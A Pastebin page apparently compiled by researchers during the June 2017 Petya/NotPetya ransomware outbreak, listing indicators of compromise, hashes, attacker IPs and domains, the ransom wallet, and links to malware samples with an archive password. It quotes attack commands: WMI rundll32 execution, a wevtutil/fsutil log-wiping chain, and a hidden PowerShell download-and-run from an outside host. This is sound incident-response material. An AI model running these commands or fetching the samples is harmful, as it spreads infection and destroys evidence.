API tools faq
paste
Advertisement
_c0mrad

PetyaTargetFiles

_c0mrad
Jun 27th, 2017
853
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.44 KB | None | 0 0
raw download clone embed print report
  1. #petya #petrWrap
  2.  
  3. Ransomware attack.
  4.  
  5. Got new info? Email at isox@vulners.com
  6.  
  7. *********** Bitcoin wallet monitoring
  8.  
  9. https://blockchain.info/address/1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX
  10.  
  11. *********** Possible malware files:
  12. https://yadi.sk/d/S0-ZhPY53KWc84
  13. https://yadi.sk/d/Zpkm88sp3KWc8v
  14. Archive password: virus
  15.  
  16. *********** Vulnerabilities/Vectors/Actions:
  17. MS17-010: https://vulners.com/search?query=ms17-010%20order:published
  18.  
  19. PSEXEC: %PROGRAMDATA%\dllhost.dat is dropped and is legit PSEXEC bin
  20.  
  21. Remote WMI, “process call create \"C:\\Windows\\System32\\rundll32.exe \\\"C:\\Windows\\perfc.dat\\\" #1”
  22.  
  23. Log clean, «wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:»
  24.  
  25. Creates a scheduled task that reboots 1 hour after infection. If task removed before the hour, does not reschedule and can buy time
  26.  
  27. *********** Possible IP addresses:
  28. 185.165.29.78
  29. 84.200.16.242
  30. 111.90.139.247
  31. 95.141.115.108
  32.  
  33. *********** Email:
  34. wowsmith123456@posteo.net
  35.  
  36. *********** Malware dropped file:
  37. http://185.165.29.78/~alex/svchost.exe
  38.  
  39. *********** Analysis:
  40. https://virustotal.com/fr/file/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745/analysis/
  41. https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100
  42. https://twitter.com/PolarToffee/status/879709615675641856
  43.  
  44. *********** Hashes by codexgigas team:
  45.  
  46. For 185.165.29.78, we have:
  47.  
  48. a809a63bc5e31670ff117d838522dec433f74bee
  49. bec678164cedea578a7aff4589018fa41551c27f
  50. d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
  51. aba7aa41057c8a6b184ba5776c20f7e8fc97c657
  52. 0ff07caedad54c9b65e5873ac2d81b3126754aac
  53. 51eafbb626103765d3aedfd098b94d0e77de1196
  54. 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
  55.  
  56. As droppers
  57.  
  58. And for 84.200.16.242:
  59.  
  60. 7ca37b86f4acc702f108449c391dd2485b5ca18c
  61. 2bc182f04b935c7e358ed9c9e6df09ae6af47168
  62. 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
  63. 82920a2ad0138a2a8efc744ae5849c6dde6b435d
  64.  
  65. *********** Targeted extensions by @GasGeverij
  66. .3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.
  67.  
  68.  
  69. *********** Potential (IOC) (No proof!!!) by Ukraine researchers, received 27th morning
  70. - - - - - - - - - - - - - - - - - - - - - - - -
  71.  
  72. File Name Order-20062017.doc (RTF із CVE-2017-0199)
  73. MD5 Hash Identifier 415FE69BF32634CA98FA07633F4118E1
  74. SHA-1 Hash Identifier 101CC1CB56C407D5B9149F2C3B8523350D23BA84
  75. SHA-256 Hash Identifier FE2E5D0543B4C8769E401EC216D78A5A3547DFD426FD47E097DF04A5F7D6D206
  76. File Size 6215 bytes
  77. File Type Rich Text Format data
  78.  
  79. Connects to the host:
  80.  
  81. 84.200.16.242 80
  82.  
  83. h11p://84.200.16.242/myguy.xls
  84.  
  85. File Name myguy.xls
  86. MD5 Hash Identifier 0487382A4DAF8EB9660F1C67E30F8B25
  87. SHA-1 Hash Identifier 736752744122A0B5EE4B95DDAD634DD225DC0F73
  88. SHA-256 Hash Identifier EE29B9C01318A1E23836B949942DB14D4811246FDAE2F41DF9F0DCD922C63BC6
  89. File Size 13893 bytes
  90. File Type Zip archive data
  91.  
  92. mshta.exe %WINDIR%\System32\mshta.exe" "C:\myguy.xls.hta" " (PID: 2324)
  93. powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe');" (PID: 2588, Additional Context: ( System.Net.WebClient).DownloadFile('h11p://french-cooking.com/myguy.exe', '%APPDATA%\10807.exe') ;)
  94. 10807.exe %APPDATA%\10807.exe" " (PID: 3096)
  95.  
  96. File Name BCA9D6.exe
  97. MD5 Hash Identifier A1D5895F85751DFE67D19CCCB51B051A
  98. SHA-1 Hash Identifier 9288FB8E96D419586FC8C595DD95353D48E8A060
  99. SHA-256 Hash Identifier 17DACEDB6F0379A65160D73C0AE3AA1F03465AE75CB6AE754C7DCB3017AF1FBD
  100. File Size 275968 bytes
  101.  
  102.  
  103. !!!! Unproofed
  104. Connects to the host:
  105.  
  106. 111.90.139.247 80
  107. COFFEINOFFICE.XYZ 80
  108.  
  109. Pay attention - the trojan on which I give the markers could potentially be used to load the encryption part.
  110.  
  111.  
  112. *********** IOС by Informzachita (infosec.ru)
  113.  
  114. type,value,comment,to_ids,date
  115. Payload delivery,md5,"71b6a493388e7d0b40c83ce903bc6b04","",1,20170627
  116. Payload delivery,sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","",1,20170627
  117. Payload delivery,sha256,"64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1","https://otx.alienvault.com/pulse/59525e7a95270e240c055ead/",1,20170627
  118. Payload delivery,sha1,"34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","",1,20170627
  119. Payload delivery,malware-sample,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|71b6a493388e7d0b40c83ce903bc6b04","Petya sample",1,20170627
  120. Payload delivery,filename|sha1,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d","Petya sample",1,20170627
  121. Payload delivery,filename|sha256,"027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745.bin|027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745","Petya sample",1,20170627
  122. Payload delivery,filename|md5,"Order-20062017.doc|415fe69bf32634ca98fa07633f4118e1","delivery",0,20170627
  123. Payload delivery,filename|sha1,"Order-20062017.doc|101cc1cb56c407d5b9149f2c3b8523350d23ba84","delivery",1,20170627
  124. Payload delivery,filename|sha256,"Order-20062017.doc|fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206","delivery",1,20170627
  125. Payload delivery,vulnerability,"CVE-2017-0199","Order-20062017.doc",0,20170627
  126. Payload delivery,filename|md5,"myguy.xls|0487382a4daf8eb9660f1c67e30f8b25","",1,20170627
  127. Payload delivery,filename|sha256,"myguy.xls|ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6","",1,20170627
  128. Payload delivery,sha1,"a809a63bc5e31670ff117d838522dec433f74bee","droppers",1,20170627
  129. Payload delivery,sha1,"d5bf3f100e7dbcc434d7c58ebf64052329a60fc2","droppers",1,20170627
  130. Payload delivery,sha1,"aba7aa41057c8a6b184ba5776c20f7e8fc97c657","droppers",1,20170627
  131. Payload delivery,sha1,"bec678164cedea578a7aff4589018fa41551c27f","droppers",1,20170627
  132. Payload delivery,sha1,"078de2dc59ce59f503c63bd61f1ef8353dc7cf5f","droppers",1,20170627
  133. Payload delivery,sha1,"0ff07caedad54c9b65e5873ac2d81b3126754aac","droppers",1,20170627
  134. Payload delivery,sha1,"51eafbb626103765d3aedfd098b94d0e77de1196","droppers",1,20170627
  135. Payload delivery,sha1,"82920a2ad0138a2a8efc744ae5849c6dde6b435d","droppers",1,20170627
  136. Payload delivery,sha1,"1b83c00143a1bb2bf16b46c01f36d53fb66f82b5","droppers",1,20170627
  137. Payload delivery,sha1,"7ca37b86f4acc702f108449c391dd2485b5ca18c","droppers",1,20170627
  138. Payload delivery,sha1,"2bc182f04b935c7e358ed9c9e6df09ae6af47168","droppers",1,20170627
  139. Payload delivery,filename|md5,"BCA9D6.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
  140. Payload delivery,filename|sha1,"BCA9D6.EXE|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
  141. Payload delivery,filename|sha256,"BCA9D6.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
  142. Payload installation,filename|sha1,"myguy.xls|736752744122a0b5ee4b95ddad634dd225dc0f73","",1,20170627
  143. Payload delivery,filename,"dllhost.dat","",1,20170627
  144. External analysis,filename|sha1,"myguy.exe|9288fb8e96d419586fc8c595dd95353d48e8a060","",1,20170627
  145. External analysis,filename|sha256,"myguy.exe|17dacedb6f0379a65160d73c0ae3aa1f03465ae75cb6ae754c7dcb3017af1fbd","",1,20170627
  146. External analysis,malware-sample,"myguy.exe|a1d5895f85751dfe67d19cccb51b051a","",1,20170627
  147. External analysis,malware-sample,"svchost.exe|d2ec63b63e88ece47fbaab1ca22da1ef","possible sample",1,20170627
  148. External analysis,filename|sha256,"svchost.exe|e5c643f1d8ecc0fd739d0bbe4a1c6c7de2601d86ab0fff74fd89c40908654be5","possible sample",1,20170627
  149. External analysis,filename|sha1,"svchost.exe|dd52fcc042a44a2af9e43c15a8e520b54128cdc8","possible sample",1,20170627
  150. Network activity,url,"http://185.165.29.78/~alex/svchost.exe","",1,20170627
  151. Network activity,url,"http://84.200.16.242/myguy.xls","",1,20170627
  152. Network activity,ip-dst|port,"84.200.16.242|80","Order-20062017.doc",1,20170627
  153. Network activity,email-dst,"wowsmith123456@posteo.net","",1,20170627
  154. Network activity,url,"http://french-cooking.com/myguy.exe","",1,20170627
  155. Network activity,ip-dst|port,"111.90.139.247|80","",1,20170627
  156. Network activity,domain,"coffeinoffice.xyz","",1,20170627
  157. Network activity,ip-dst,"95.141.115.108","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
  158. Network activity,ip-dst,"84.200.16.242","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
  159. Network activity,ip-dst,"111.90.139.247","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
  160. Network activity,ip-dst,"185.165.29.78","https://twitter.com/JC_DiazGarcia/status/879719578171060228",1,20170627
  161. Artifacts dropped,filename,"%WINDIR%\perfc.dat","",1,20170627
  162. Artifacts dropped,filename,"C:\myguy.xls.hta","",1,20170627
  163. Artifacts dropped,filename,"%APPDATA%\10807.exe","",1,20170627
  164. Financial fraud,btc,"1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX","",0,20170627
  165. External analysis,vulnerability,"CVE-2017-0144","",0,20170627
  166. External analysis,comment,"attack-vector:phishing","",0,20170627
  167.  
  168.  
  169. *********** Has sysinternal utilities signature
  170. https://twitter.com/ppeepuppy/status/879706271535972353
  171.  
  172. *********** Uses the The GetExtendedTcpTable function to get a list of available endpoints
  173. https://twitter.com/pjcampbe11/status/879709929073979392
  174.  
  175. *********** List of extensions targeted
  176. https://twitter.com/MrCarlMcDade/status/879706580127809536
  177.  
  178. *********** Indicates possible usage of PSEXEC, on windows that means the admin$ and c$ shares.
  179. https://twitter.com/rikvduijn/status/879726410201526272
  180.  
  181. *********** It is confirmed that the sample 027cc... contains PSEXEC:
  182. https://twitter.com/NVISO_Labs/status/879724733696274432
  183.  
  184. *********** Friends in Ukraine are telling me this helps to recover from Petya (untested):
  185. https://twitter.com/msuiche/status/879722894997278720
  186. bootrec /RebuildBcd
  187. bootrec /fixMbr
  188. bootrec /fixboot
  189.  
  190. *********** Petya— Enhanced WannaCry? What we know so far.
  191. https://blog.comae.io/byata-enhanced-wannacry-a3ddd6c8dabb
  192.  
  193. *********** Found evidences of post kernel exploitation too: IA32_SYSENTER_EIP after decoding kernel shellcode
  194. https://twitter.com/msuiche/status/879713211368525824
  195.  
  196. *********** #Petya uses long #sleep functions: if infected you have 30-40 mins to turn off your computer to save it from ransom.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!